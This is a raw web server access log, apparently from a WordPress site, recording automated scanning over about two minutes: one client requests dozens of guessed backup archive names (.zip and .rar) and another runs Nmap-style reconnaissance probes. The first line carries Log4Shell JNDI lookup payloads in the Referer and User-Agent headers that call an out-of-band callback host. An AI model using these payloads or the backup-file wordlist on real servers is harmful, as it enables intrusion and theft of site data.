160.202.230.95 - - [23/Jul/2026:20:25:30 +0800] "GET / HTTP/1.1" 301 5 "${jndi:ldap://${:-253}${:-958}.${hostName}.referer.d9guf7henn3kn1fujvg01suax4xyyiez9.oast.live}" "${jndi:ldap://${:-253}${:-958}.${hostName}.useragent.d9guf7henn3kn1fujvg0t1huugq1byuaz.oast.live}"
160.202.230.95 - - [23/Jul/2026:20:25:32 +0800] "GET /www.cqqizhou.com.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:34 +0800] "GET /cqqizhou.com.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:35 +0800] "GET /cqqizhou.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:37 +0800] "GET /www.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:38 +0800] "GET /2026.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:39 +0800] "GET /web.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:41 +0800] "POST / HTTP/1.1" 200 35067 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:41 +0800] "GET /1.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:42 +0800] "GET /assets.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:44 +0800] "GET /www.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:45 +0800] "GET /src.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:46 +0800] "GET /backup.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:47 +0800] "GET / HTTP/1.1" 301 5 "https://www.baidu.com" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:48 +0800] "GET /bak.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:50 +0800] "GET /app.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:51 +0800] "GET /bin.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:53 +0800] "GET /index.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:54 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:54 +0800] "GET /public.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:56 +0800] "GET /file.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:57 +0800] "GET /backups.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:25:58 +0800] "GET /admin.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:00 +0800] "GET /ROOT.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:01 +0800] "GET /wwwroot.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:02 +0800] "GET /html.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:04 +0800] "GET /webapps.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:05 +0800] "GET /htdocs.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:06 +0800] "GET /ht_docs.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:08 +0800] "GET /resources.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:09 +0800] "GET /output.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:10 +0800] "GET /images.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:11 +0800] "GET /public_html.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:12 +0800] "GET /uploads.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:13 +0800] "GET /media.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:15 +0800] "GET /website.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:16 +0800] "GET /documents.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:17 +0800] "GET /site.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:18 +0800] "GET /api.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:20 +0800] "GET /test.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:22 +0800] "GET /config.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:23 +0800] "GET /old.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:24 +0800] "GET /Release.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:25 +0800] "GET /database.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:26 +0800] "GET /dump.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:27 +0800] "GET /db.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:28 +0800] "GET /inetpub.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:29 +0800] "GET /build.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:20:26:30 +0800] "POST /wp-cron.php?doing_wp_cron=1784809590.3549430370330810546875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.95 - - [23/Jul/2026:20:26:30 +0800] "GET /application.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:31 +0800] "GET /conf.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:33 +0800] "GET /target.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:34 +0800] "GET /upload.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:35 +0800] "GET /data.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:36 +0800] "GET /attachment.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:37 +0800] "GET /2026.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:38 +0800] "GET /2025.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:40 +0800] "GET /2024.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:41 +0800] "GET /2023.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:42 +0800] "GET /2022.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:43 +0800] "GET /2021.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:44 +0800] "GET /2020.zip HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:45 +0800] "GET /www.cqqizhou.com.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:47 +0800] "GET /cqqizhou.com.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:48 +0800] "GET /cqqizhou.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:49 +0800] "GET /www.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:51 +0800] "GET /2026.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:52 +0800] "GET /web.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:53 +0800] "GET /1.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:55 +0800] "GET /assets.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:56 +0800] "GET /www.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:57 +0800] "GET /src.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:26:59 +0800] "GET /backup.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:00 +0800] "GET /bak.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:02 +0800] "GET /app.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:03 +0800] "GET /bin.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:05 +0800] "GET /index.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:06 +0800] "GET /public.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:07 +0800] "GET /file.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
36.133.115.36 - - [23/Jul/2026:20:27:09 +0800] "POST /wp-cron.php?doing_wp_cron=1784809629.2764499187469482421875 HTTP/1.1" 200 31 "-" "WordPress/7.0; http://cqqizhou.com"
160.202.230.95 - - [23/Jul/2026:20:27:09 +0800] "GET /backups.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:10 +0800] "GET /admin.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:12 +0800] "GET /ROOT.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:13 +0800] "GET /wwwroot.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:14 +0800] "GET /html.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:16 +0800] "GET /webapps.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:17 +0800] "GET /htdocs.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:18 +0800] "GET /ht_docs.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:19 +0800] "POST /sdk HTTP/1.1" 404 32862 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:19 +0800] "GET /nmaplowercheck1784809630 HTTP/1.1" 404 32862 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:20 +0800] "GET /resources.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:21 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:22 +0800] "GET /evox/about HTTP/1.1" 404 32862 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:22 +0800] "GET /HNAP1 HTTP/1.1" 404 32862 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:22 +0800] "GET /output.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:22 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
61.142.42.201 - - [23/Jul/2026:20:27:23 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:24 +0800] "GET /images.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:25 +0800] "GET /public_html.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:27 +0800] "GET /uploads.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:28 +0800] "GET /media.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:29 +0800] "GET /website.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:31 +0800] "GET /documents.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:32 +0800] "GET /site.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:33 +0800] "GET /api.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:34 +0800] "GET /test.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:35 +0800] "GET /config.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:37 +0800] "GET /old.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:38 +0800] "GET /Release.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:39 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
160.202.230.95 - - [23/Jul/2026:20:27:40 +0800] "GET /database.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
61.142.42.201 - - [23/Jul/2026:20:27:41 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
160.202.230.95 - - [23/Jul/2026:20:27:42 +0800] "GET /dump.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:43 +0800] "GET /db.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:44 +0800] "GET /inetpub.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
160.202.230.95 - - [23/Jul/2026:20:27:46 +0800] "GET /build.rar HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
